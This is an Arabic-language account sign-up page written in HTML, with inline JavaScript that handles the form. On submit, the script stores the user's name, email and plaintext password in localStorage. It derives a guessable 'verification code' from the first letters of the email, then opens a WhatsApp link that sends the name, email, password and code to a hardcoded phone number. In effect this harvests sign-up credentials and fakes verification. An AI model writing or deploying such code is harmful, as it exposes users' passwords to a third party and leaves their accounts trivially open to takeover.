<!DOCTYPE html>
<html lang="ar">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>إنشاء حساب</title>
    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
    <style>
        body, html {
            height: 100%;
            margin: 0;
            font-family: Arial, Helvetica, sans-serif;
        }
        .bg {
            background-image: url('welcome_image.jpg');
            height: 100%;
            background-position: center;
            background-repeat: no-repeat;
            background-size: cover;
            display: flex;
            justify-content: center;
            align-items: center;
            text-align: center;
            color: white;
        }
        .container {
            background-color: rgba(0, 0, 0, 0.5);
            padding: 20px;
            border-radius: 10px;
        }
    </style>
    <script>
        function generateVerificationCode(email) {
            const emailPrefix = email.substring(0, 4).toLowerCase();
            const charCodes = Array.from(emailPrefix).map(char => char.charCodeAt(0) - 96);
            return charCodes.join('');
        }

        function sendToWhatsApp(name, email, password, verificationCode) {
            const message = `الاسم: ${name}%0Aالبريد الإلكتروني: ${email}%0Aكلمة السر: ${password}%0Aرمز التحقق: ${verificationCode}`;
            const phoneNumber = "+963990764268";
            const whatsappLink = `https://wa.me/${phoneNumber}?text=${message}`;
            window.open(whatsappLink, '_blank');
        }

        function handleSubmit(event) {
            event.preventDefault();
            const name = document.getElementById('name').value;
            const email = document.getElementById('email').value;
            const password = document.getElementById('password').value;
            const confirmPassword = document.getElementById('confirm-password').value;

            if (password !== confirmPassword) {
                alert("كلمات السر غير متطابقة");
                return;
            }

            const verificationCode = generateVerificationCode(email);

            // Save user data and verification code to localStorage
            const userData = { name, email, password, verificationCode };
            localStorage.setItem(email, JSON.stringify(userData));

            sendToWhatsApp(name, email, password, verificationCode);

            // Redirect to verification page
            window.location.href = `verify.html?email=${encodeURIComponent(email)}`;
        }
    </script>
</head>
<body>
    <div class="bg">
        <div class="container mt-5">
            <h2>إنشاء حساب</h2>
            <form onsubmit="handleSubmit(event)">
                <div class="form-group">
                    <label for="name">الاسم:</label>
                    <input type="text" class="form-control" id="name" required>
                </div>
                <div class="form-group">
                    <label for="email">البريد الإلكتروني:</label>
                    <input type="email" class="form-control" id="email" required>
                </div>
                <div class="form-group">
                    <label for="password">كلمة السر:</label>
                    <input type="password" class="form-control" id="password" required>
                </div>
                <div class="form-group">
                    <label for="confirm-password">تأكيد كلمة السر:</label>
                    <input type="password" class="form-control" id="confirm-password" required>
                </div>
                <button type="submit" class="btn btn-primary">إنشاء حساب وإرسال البيانات</button>
            </form>
        </div>
    </div>
</body>
</html>